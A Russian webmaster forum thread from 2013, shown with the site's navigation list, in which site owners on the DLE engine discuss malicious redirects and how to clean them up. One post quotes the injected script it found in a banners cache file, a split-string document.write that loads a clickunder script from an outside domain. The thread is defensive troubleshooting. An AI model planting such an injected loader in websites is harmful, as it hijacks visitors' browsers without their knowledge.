- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
В 2023 году Google заблокировал более 170 млн фальшивых отзывов на Картах
Это на 45% больше, чем в 2022 году
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
попробуйте вот это мне помогало, find-link http://find-xss.net/news/article/find-link/
ищет во всех файлах на фтп.
---------- Добавлено 17.01.2013 в 15:16 ----------
а точнее даже вот это для вашего случая http://find-xss.net/news/article/find-date/
ищет последние изменённые файлы
Уважаемые господа форумчане.
Хочу поблагодарить всех за дельные советы. Проблема решена. Особо хочется отметить и поблагодарить форумчанина SpaceX, который непосредственно принял участие и помог решить проблему.
Для тех кому интересно: в файл майн был внедрен вредоносный скрипт.
Всем спасибо.
в файл майн был внедрен вредоносный скрипт
Ну в этих файлах в первую очередь нужно искать нечисть.
У меня ваш сайт очень долго грузится. За пару минут только title показался.
В последнее время хостер жалуется, что большая нагрузка на аккаунт, много подозрительных обращений к сайтам.
NOD досихпор орет что сайт вирусный :)
Движек случаем не ДЛЕ? У меня и у еще нескольких форумчан было что внедряли скрипт в майн, но только с смартфонов было заметно.
Решение так и не нашли. Поменяли пароли и все.
Движок дле. Скрипт убрал и поменял пароли. Кстати, в моем случае в мозиле открывался сайт окей, а в остальных брауз. открывался чужак.
Движок дле. Скрипт убрал и поменял пароли. Кстати, в моем случае в мозиле открывался сайт окей, а в остальных брауз. открывался чужак.
Это не от браузера зависит, у меня в Opera если включена блокировка всплывающих окон то всё нормально, если нет то редиректит.
Здравствуйте. Опять проблема. Сегодня обнаружил следующее: при попытке войти с админки в раздел «Рекламные материалы» (сайт на дле) браузер открывает совершенно другой адрес: pagesinxt.com/?dn=clme.net&f... Все остальные разделы админки и страницы сайта функционируют нормально. Залил сайт на комп. Проверил Folder Find-ом по запросу «Clme.net» и обнаружил в файле кэша: /engine/cache/system/banners.php скрипт который исполняет переадресацию: <script>
var siteid=39635;
var cats='29,24,14,8,18,11,33,62,28,27,32,10,22,63,9,16,7,71,67,69,66,68,20';
var adult='0';
document.write('<scr'+'ipt type="text/jav'+'ascript" src="clme.netclick'+'under.js"></scr'+'ipt>');
</script>
Просканировал Folder Find-ом все папки и файлы сайта по запросу clme, но ничего не нахидит.
Вопрос: Подскажите, пожалуйста как найти код, или где точно искать, в каких файлах правят админку?
---------- Добавлено 14.02.2013 в 17:33 ----------
Спасибо. Проблема решена.
Где то на сервере у вас залит шелл. и судя по всему залили его давно, и восстанавливай его из бекапа не восстанавливай он там. Через этот шел и внедряют в исполняемые файлы всякую дрянь.
Если этот шел не найти и не удалить, та у вас так и дальше будут пояляться всякие редиректы.
Мой совет, скачайте се файлы сайта на рабочий компьютер и проверте их разными антивирусами.
проблемные файлы проверьте есть ли они в дистрибутиве DLE если есть замените их на чистые из дистрибутива, если нет то надо удалять.